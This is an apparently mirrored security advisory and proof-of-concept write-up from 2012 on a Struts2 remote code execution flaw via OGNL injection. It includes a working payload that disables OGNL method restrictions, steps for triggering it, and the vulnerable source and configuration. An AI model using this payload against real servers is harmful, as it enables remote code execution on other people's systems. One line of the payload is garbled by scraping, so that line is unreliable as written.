apache struts2 remote code execute

2012-09-0300:00:00

vulners.com

JSON

this method was published at xcon2012 xcon.xfocus.net.
kxlzx http://www.inbreak.net

flow this and step by step:

1, down load struts2-showcase from struts.apache.org
2, run struts2-showcase.
3, open url:
http://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRING-DEV
4, write skill name to %{expr} for example:
%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#[email protected]@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())}
5, submit and all will done.

this method:
public static String translateVariables(String expression, ValueStack stack) {
return translateVariables(new char[]{'$', '%'}, expression, stack, String.class, null).toString();
}
look two char "$" and "%"

and
this method:

public static Object translateVariables&#40;char[] openChars, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount&#41; {
    // deal with the &quot;pure&quot; expressions first!
    //expression = expression.trim&#40;&#41;;
    Object result = expression;
    for &#40;char open : openChars&#41; {

…
while (true) {
…
String var = expression.substring(start + 2, end);

                Object o = stack.findValue&#40;var, asType&#41;;

…
if user input is "%{expr}"
this will execute ognl like:
${%{expr}}

this need devloper code like:

<action name="redirect" class="net.inbreak.RedirectAction">
<result name="redirect" type="redirect">${redirectUrl}</result>
</action>

or like:
<action name="save" class="org.apache.struts2.showcase.action.SkillAction" method="save">
<result type="redirect">edit.action?skillName=${currentSkill.name}</result>
</action>

kxlzx at alibaba security team.
my blog :http://www.inbreak.net

JSON